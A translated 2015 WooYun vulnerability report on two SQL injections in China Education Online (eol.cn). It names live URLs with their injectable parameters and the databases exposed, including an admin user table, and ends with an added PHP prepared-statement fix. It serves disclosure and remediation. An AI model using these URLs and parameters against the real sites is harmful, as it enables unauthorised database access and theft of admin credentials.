
Vulnerability summary

Defect ID: wooyun-2015-096804

Title: Two SQL injections in China Education Online (中国教育在线)

Vendor: eol.cn

Author: Taro

Submitted: 2015-02-14 10:15

Fix time: 2015-02-19 10:16

Published: 2015-02-19 10:16

Type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-02-14: Details sent to the vendor, awaiting vendor handling
2015-02-19: Vendor actively ignored the vulnerability; details disclosed to the public

Summary:

Postgraduate application enquiry system; model high school information database

Details:

Postgraduate application enquiry system (the `schoolid` parameter of the URL below is injectable):
http://souky.eol.cn/fenshu_search_34.php?=88952634&schoolid=5&xueke=01&xuewei_class=1



Database: souky5
[58 tables]


Database: souky5
Table: adminuser
[4 entries]


Model high school information database (the `province` parameter of the URL below is injectable):
http://haogaozhong.eol.cn/school_area.php?province=11



Database: haogaozhong
[48 tables]


Proof of vulnerability:


Remediation:
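The report leaves the remediation section empty. As an added example that is not the report's or eol.cn's code, the handler below shows how a PHP endpoint like `fenshu_search_34.php?schoolid=5&xueke=01&xuewei_class=1` can validate its inputs and bind them with PDO prepared statements instead of concatenating them into SQL; the column names, the `fenshu_34` table layout and the read-only database account are assumptions.

```php
<?php
// Added example, not eol.cn's code. Column names, table layout and the
// read-only account "souky_ro" are assumptions for illustration.
declare(strict_types=1);

// Vulnerable pattern the report implies (shown only as the "before"):
//   $sql = "SELECT * FROM fenshu_34 WHERE schoolid=" . $_GET['schoolid'] . " ...";

function fetchScores(PDO $db, array $query): array
{
    // Validate each parameter against the shape the application expects
    // before it reaches the database layer: integers for ids, two digits
    // for the subject code (xueke).
    $intOpts  = ['options' => ['min_range' => 1]];
    $schoolid = filter_var($query['schoolid'] ?? '', FILTER_VALIDATE_INT, $intOpts);
    $xuewei   = filter_var($query['xuewei_class'] ?? '', FILTER_VALIDATE_INT, $intOpts);
    $xueke    = (string)($query['xueke'] ?? '');

    if ($schoolid === false || $xuewei === false || !preg_match('/^\d{2}$/', $xueke)) {
        http_response_code(400);
        return [];
    }

    // Prepared statement: values are bound with explicit types and never
    // become part of the SQL text, so quotes or operators in input are inert.
    $stmt = $db->prepare(
        'SELECT * FROM fenshu_34
          WHERE schoolid = :schoolid AND xueke = :xueke AND xuewei_class = :xuewei'
    );
    $stmt->bindValue(':schoolid', $schoolid, PDO::PARAM_INT);
    $stmt->bindValue(':xueke', $xueke, PDO::PARAM_STR);
    $stmt->bindValue(':xuewei', $xuewei, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Least privilege: a read-only account for the public search pages limits
// what an injection elsewhere could read or change (adminuser stays out of reach).
$db = new PDO('mysql:host=127.0.0.1;dbname=souky5;charset=utf8mb4', 'souky_ro', getenv('DB_PASS'), [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepared statements
]);

header('Content-Type: application/json; charset=utf-8');
echo json_encode(fetchScores($db, $_GET));
```

The same pattern applies to `school_area.php?province=11`: validate `province` as an integer and bind it, rather than interpolating it.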

Copyright notice: please credit the source when reposting. Taro@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: No impact, vendor ignored

Ignored at: 2015-02-19 10:16

Vendor reply:

Vulnerability Rank: 4 (WooYun rating)

Latest status:

None yet


Vulnerability rating:
